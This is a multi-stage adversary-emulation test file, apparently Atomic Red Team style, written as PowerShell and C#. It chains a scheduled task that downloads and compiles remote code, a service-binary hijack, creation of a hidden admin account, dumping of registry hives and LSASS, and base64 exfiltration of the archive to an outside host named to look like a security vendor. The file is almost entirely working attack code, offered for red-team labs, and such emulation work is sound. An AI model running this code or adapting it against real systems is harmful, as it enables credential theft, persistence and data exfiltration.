attack_technique: Stage1
display_name: "Initial Compromise Example"
atomic_tests:
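# T1053.005 Scheduled Task/Job + T1119 Automated Collection
# Stage 1: a user-level scheduled task pulls service-permission discovery code at run time and writes the
# list of modifiable services to %APPDATA%\services.txt for the next test to consume.
- name: T1053.005 - Scheduled Task and T1119 Automated Collection
  auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
  description: |
    Create a scheduled task named "T1" with native PowerShell cmdlets, running as the current user.
    Upon successful execution the task is registered (daily at 00:01) and started immediately; it launches
    powershell.exe -Command %APPDATA%\prayload.ps1, which runs an encoded script that downloads discovery.cs
    from GitHub, compiles it in memory with Add-Type and writes the modifiable-service list to
    %APPDATA%\services.txt.
    NOTE: the remote source is fetched without any integrity check, so whatever that file contains at run time
    is compiled and executed. Run only on an isolated lab host.
  supported_platforms:
    - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      # Script the scheduled task will run (encoded below). It expects discovery.cs to hold SharpUp's
      # "namespace SharpUp { class Program { static ... GetModifiableServices() } }" and renames both so the
      # compiled type is ShipOut.Runny<random>; the random suffix presumably avoids Add-Type "type already
      # exists" errors on repeated runs in one session.
      $psh = @'
      $id = Get-Random
      $code = (iwr -UseBasicParsing https://raw.githubusercontent.com/mobia-security-services/adversarysimulationworkshop/main/discovery.cs) -replace "class Program","class Runny$id" -replace "namespace SharpUp","namespace ShipOut"
      $assemblies = ('System.Xml.Linq','System.Core','System.Data','System.Xml', 'System.Data.DataSetExtensions', 'Microsoft.CSharp', 'System.ServiceProcess', 'System.Management')
      Add-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp -IgnoreWarnings
      iex -Command "[ShipOut.Runny$id]::GetModifiableServices()"
      '@
      # -EncodedCommand takes base64 of the UTF-16LE script. The wrapper file redirects the script's output to
      # %APPDATA%\services.txt, which the next test parses.
      $bytes = [System.Text.Encoding]::Unicode.GetBytes($psh)
      $encodedCommand = [Convert]::ToBase64String($bytes)
      "powershell -enc $encodedCommand | out-file $env:APPDATA\services.txt" | % { $_ | out-file $env:APPDATA\prayload.ps1 }
      # Task "T1": action = powershell.exe running the wrapper, principal = current user, trigger = daily 00:01.
      $A = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Command $env:APPDATA\prayload.ps1"
      $T = New-ScheduledTaskTrigger -Daily -At "00:01"
      $P = New-ScheduledTaskPrincipal "$env:USERNAME"
      $S = New-ScheduledTaskSettingsSet
      $D = New-ScheduledTask -Action $A -Principal $P -Trigger $T -Settings $S
      Register-ScheduledTask T1 -InputObject $D -Force
      start-sleep 5
      Start-ScheduledTask -TaskName T1
      # The task downloads, compiles and runs the discovery code, which can take far longer than a fixed 5 s;
      # wait (bounded) until it leaves the Running state so services.txt is complete for the next test.
      $deadline = (Get-Date).AddSeconds(180)
      do { start-sleep 5 } while ((Get-ScheduledTask -TaskName T1).State -eq 'Running' -and (Get-Date) -lt $deadline)
    cleanup_command: |
      # Task name must match the Register-ScheduledTask call above ("T1"); also remove the dropped files.
      Unregister-ScheduledTask -TaskName "T1" -Confirm:$false -ErrorAction SilentlyContinue
      Remove-Item "$env:APPDATA\prayload.ps1","$env:APPDATA\services.txt" -Force -ErrorAction SilentlyContinue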
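# Stage 2: consume the scheduled-task output (T1053.005), hijack a service whose binary path is writable
# (T1574.010) and dump credentials as the service account (T1003.001 LSASS; the payload also saves the
# SAM/SECURITY/SYSTEM hives, T1003.002, and creates a local admin account, T1136.001).
- name: T1053.005 - Scheduled Task + T1574.010 Services File Permission Weakness + T1003.001 LSASS
  # TODO(review): this guid is identical to the first test's; regenerate it (e.g. [guid]::NewGuid()) so the
  # two tests can be addressed individually by guid.
  auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
  description: |
    Parse the modifiable-service list the previous test wrote to %APPDATA%\services.txt, overwrite the binary of
    the first listed service with a freshly compiled C:\temp\prayload.cs and restart the service so the payload
    runs under the service account (often LocalSystem, but that depends on the service that is picked).
    The payload creates a local administrator "TestUser1" (password #12345Abc) if it does not exist, saves the
    SAM, SECURITY and SYSTEM hives to C:\temp\*.save and dumps LSASS to C:\temp\temp.dmp via comsvcs.dll MiniDump.
    DESTRUCTIVE: the original service binary is overwritten in place. A copy is kept at <binary>.bak and the
    service name/path are recorded in C:\temp\svc.json so cleanup_command can restore it. The output files
    contain real credential material for this host; run only on an isolated lab machine.
  supported_platforms:
    - windows
  dependency_executor_name: powershell
  dependencies:
    - description: |
        %APPDATA%\services.txt must exist (produced by the preceding scheduled-task test).
      prereq_command: |
        if (Test-Path "$env:APPDATA\services.txt") { exit 0 } else { exit 1 }
      get_prereq_command: |
        Write-Host "Run the preceding scheduled-task test first and wait for task T1 to finish."
  executor:
    name: powershell
    elevation_required: false
    command: |
      # Everything this stage produces (payload source, hive saves, LSASS dump, restore record) lives under C:\temp;
      # reg.exe and comsvcs.dll do not create it, so make sure it exists before anything runs.
      New-Item -ItemType Directory -Path C:\temp -Force | Out-Null
      if (-not (Test-Path "$env:AppData\services.txt")) {
        Write-Warning "services.txt not found under $env:AppData - run the scheduled-task test first."
        return
      }
      $f=(Get-Content $env:AppData\services.txt)
      $targets = @()
      # services.txt appears to be list-style "Name : x" / "PathName : y" output; the chain below reshapes each
      # Name/PathName pair into a one-line JSON object for ConvertFrom-Json. Left exactly as written: the
      # regex replacements are order-sensitive.
      (($f -match '^ (Name|PathName)') -replace ' Name',"`nName" -replace " PathName","PathName") -join "," | % {
        if($_ -notmatch '^ '){
          $_ -replace "`",`n","`"`n" -replace "^`n",'' -split "`n" | % {
            $service = ("{{'{0}'}}" -f ("$_" -replace ' : ',"':'" -replace ',',"','" -replace '\\','\\'))
            $targets += ($service |convertfrom-json)
          }
        }
      }
      if($targets.Count -gt 0){
      # $id is not set in this test's scope, so the class name normally expands to plain "Program".
      $code = @"
      using System;
      using System.DirectoryServices;
      using System.Diagnostics;
      namespace HelloWorld
      {
          public class Program$id
          {
              public static void Main(){
                  // Ensure a local "TestUser1" exists and is in Administrators (WinNT provider).
                  // NOTE(review): Find("Administrators") is name-based and fails on localized Windows where
                  // the group has another name; resolving S-1-5-32-544 would be locale-safe.
                  DirectoryEntry hostMachineDirectory = new DirectoryEntry("WinNT://localhost");
                  DirectoryEntries entries = hostMachineDirectory.Children;
                  bool userExists = false;
                  foreach (DirectoryEntry each in entries)
                  {
                      userExists = each.Name.Equals("TestUser1",StringComparison.CurrentCultureIgnoreCase);
                      if (userExists)
                          break;
                  }
                  if (false == userExists)
                  {
                      DirectoryEntry AD = new DirectoryEntry("WinNT://" +
                      Environment.MachineName + ",computer");
                      DirectoryEntry NewUser = AD.Children.Add("TestUser1", "user");
                      NewUser.Invoke("SetPassword", new object[] {"#12345Abc"});
                      NewUser.Invoke("Put", new object[] {"Description", "Test User from .NET"});
                      NewUser.CommitChanges();
                      DirectoryEntry grp;
                      grp = AD.Children.Find("Administrators", "group");
                      if (grp != null) {grp.Invoke("Add", new object[] {NewUser.Path.ToString()});}
                      Console.WriteLine("Account Created Successfully");
                  }
                  // Save the three hives needed for offline credential extraction (requires admin/SYSTEM).
                  var sam = new Process {
                      StartInfo = new ProcessStartInfo {
                          FileName = @"c:\windows\system32\reg.exe",
                          Arguments = @"save hklm\sam c:\temp\sam.save"
                      }
                  };
                  sam.Start();
                  sam.WaitForExit();
                  var security = new Process {
                      StartInfo = new ProcessStartInfo {
                          FileName = @"c:\windows\system32\reg.exe",
                          Arguments = @"save hklm\security c:\temp\security.save"
                      }
                  };
                  security.Start();
                  security.WaitForExit();
                  var system = new Process {
                      StartInfo = new ProcessStartInfo {
                          FileName = @"c:\windows\system32\reg.exe",
                          Arguments = @"save hklm\system c:\temp\system.save"
                      }
                  };
                  system.Start();
                  system.WaitForExit();
                  // Dump the first lsass process with the comsvcs.dll MiniDump export, then rename the dump.
                  Process[] processlist = Process.GetProcessesByName("lsass");
                  foreach (Process p in processlist)
                  {
                      var strPID = Convert.ToString(p.Id);
                      var process = new Process {
                          StartInfo = new ProcessStartInfo {
                              FileName = @"c:\windows\system32\rundll32.exe",
                              Arguments = String.Format(@"C:\windows\System32\comsvcs.dll, MiniDump {0} C:\Temp\dumper.dmp full",strPID)
                          }
                      };
                      process.Start();
                      process.WaitForExit();
                      // cmd /c (not /k): /k keeps the shell alive, so WaitForExit below would never return.
                      var copy = new Process {
                          StartInfo = new ProcessStartInfo {
                              FileName = @"c:\windows\system32\cmd.exe",
                              Arguments = String.Format("/c \"move /Y C:\\Temp\\dumper.dmp C:\\temp\\temp.dmp\"")
                          }
                      };
                      copy.Start();
                      copy.WaitForExit();
                      break;
                  }
              }
          }
      }
      "@ | out-file C:\temp\prayload.cs
      $name = $targets[0].Name.Trim()
      # PathName is usually quoted; strip the quotes so csc /out: gets a bare path.
      # NOTE(review): any arguments that follow the executable in PathName are not stripped here - confirm for
      # the service that ends up first in services.txt.
      $path = ($targets[0].PathName -replace '"','')
      # Keep the original binary and record what was hijacked so cleanup_command can put it back.
      Copy-Item -LiteralPath $path -Destination "$path.bak" -Force -ErrorAction SilentlyContinue
      @{ Name = $name; PathName = $path } | ConvertTo-Json -Compress | Out-File C:\temp\svc.json
      C:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:$path c:\temp\prayload.cs
      # The replacement is a plain console exe, not a real service: SCM will likely report a start timeout
      # (1053) but Main still runs. If this account lacks stop/start rights on the service, the payload only
      # runs at the service's next start (e.g. reboot).
      Stop-Service $name -ErrorAction SilentlyContinue
      Start-Service $name -ErrorAction SilentlyContinue
      }
    cleanup_command: |
      # Best run elevated: deleting the account and controlling the service need admin rights.
      # Restore the hijacked service binary from the .bak copy recorded by the test.
      if (Test-Path C:\temp\svc.json) {
        $svc = Get-Content C:\temp\svc.json -Raw | ConvertFrom-Json
        if (Test-Path -LiteralPath "$($svc.PathName).bak") {
          Stop-Service $svc.Name -ErrorAction SilentlyContinue
          Move-Item -LiteralPath "$($svc.PathName).bak" -Destination $svc.PathName -Force -ErrorAction SilentlyContinue
          Start-Service $svc.Name -ErrorAction SilentlyContinue
        }
      }
      net user TestUser1 /delete *>$null
      # Credential material and the payload source (which embeds the account password) must not be left behind.
      Remove-Item C:\temp\temp.dmp, C:\temp\dumper.dmp, C:\temp\*.save, C:\temp\prayload.cs, C:\temp\svc.json -Force -ErrorAction SilentlyContinue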
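# T1560.001 Archive Collected Data (as the admin account created by the previous test, over loopback WinRM)
- name: Compress Data for Transport
  auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
  description: |
    Compress the LSASS dump and registry hive saves from C:\Temp into C:\Temp\<COMPUTERNAME>_exfil.zip using
    PowerShell, running as the newly created local administrator TestUser1 through a loopback Invoke-Command.
    Requires WinRM/PS remoting to be enabled on the host.
  supported_platforms:
    - windows
  dependency_executor_name: powershell
  dependencies:
    - description: |
        TestUser1 must exist, C:\Temp\temp.dmp and at least one C:\temp\*.save must be present (all produced by
        the previous test), and WinRM must answer locally.
      prereq_command: |
        net user TestUser1 *>$null
        if ($LASTEXITCODE -eq 0 -and (Test-Path C:\Temp\temp.dmp) -and (Test-Path C:\temp\*.save) -and (Test-WSMan -ErrorAction SilentlyContinue)) { exit 0 } else { exit 1 }
      get_prereq_command: |
        Write-Host "Run the preceding service-hijack test first; if WinRM is off, run Enable-PSRemoting -Force from an elevated prompt."
  executor:
    name: powershell
    elevation_required: false
    command: |
      # Credentials of the account the previous stage created; hard-coded on purpose to match that payload.
      $Username = 'testuser1'
      $Password = '#12345Abc'
      $pass = ConvertTo-SecureString -AsPlainText $Password -Force
      $Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
      # -SkipRevocationCheck only affects HTTPS listeners; it is harmless on the default HTTP loopback.
      invoke-command -ComputerName $env:COMPUTERNAME -Credential $Cred -SessionOption (New-PSSessionOption -SkipRevocationCheck) -ScriptBlock {
        $compress = @{
          Path = "C:\Temp\temp.dmp","C:\temp\*.save"
          CompressionLevel = "Fastest"
          DestinationPath = "C:\Temp\${env:COMPUTERNAME}_exfil.zip"
        }
        Compress-Archive @compress -Force
      }
    cleanup_command: |
      Remove-Item "C:\Temp\${env:COMPUTERNAME}_exfil.zip" -Force -ErrorAction SilentlyContinue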
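# T1567 Exfiltration Over Web Service (to view results https://windowsdefenderpro.net/{reqid from c:\temp\reqid.txt})
- name: Exfiltration Over Web Service
  auto_generated_guid: d1334303-59cb-4a03-8213-b3e24d02c198
  description: |
    POST C:\Temp\<COMPUTERNAME>_exfil.zip, base64-encoded, to https://windowsdefenderpro.net/upload/ with
    PowerShell and store the reqid returned by the service in C:\temp\reqid.txt.
    WARNING: the archive holds this host's SAM/SECURITY/SYSTEM hives and an LSASS dump, i.e. real credentials,
    and they are sent to an endpoint you do not control. Run only on an isolated lab host whose credentials are
    disposable, or point $uri at collection infrastructure you own.
  supported_platforms:
    - windows
  dependency_executor_name: powershell
  dependencies:
    - description: |
        C:\Temp\<COMPUTERNAME>_exfil.zip must exist (produced by the previous test).
      prereq_command: |
        if (Test-Path "C:\Temp\${env:COMPUTERNAME}_exfil.zip") { exit 0 } else { exit 1 }
      get_prereq_command: |
        Write-Host "Run the preceding archive test first; it produces the zip."
  executor:
    name: powershell
    elevation_required: false
    command: |
      $uri = "https://windowsdefenderpro.net/upload/"
      # The whole archive is read into memory and base64-encoded (about 4/3 its size) before the POST.
      $base64Zip = [convert]::ToBase64String(([System.IO.File]::ReadAllBytes("C:\Temp\${env:COMPUTERNAME}_exfil.zip")))
      # The service is expected to answer with JSON containing a reqid; anything else makes ConvertFrom-Json fail.
      $result = (Invoke-WebRequest -uri $uri -Method Post -Body $base64Zip -ContentType "application/base64" -UseBasicParsing).Content | convertfrom-json
      $result.reqid | out-file -FilePath C:\temp\reqid.txt
    cleanup_command: |
      Remove-Item C:\temp\reqid.txt -Force -ErrorAction SilentlyContinue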
# END STAGE 1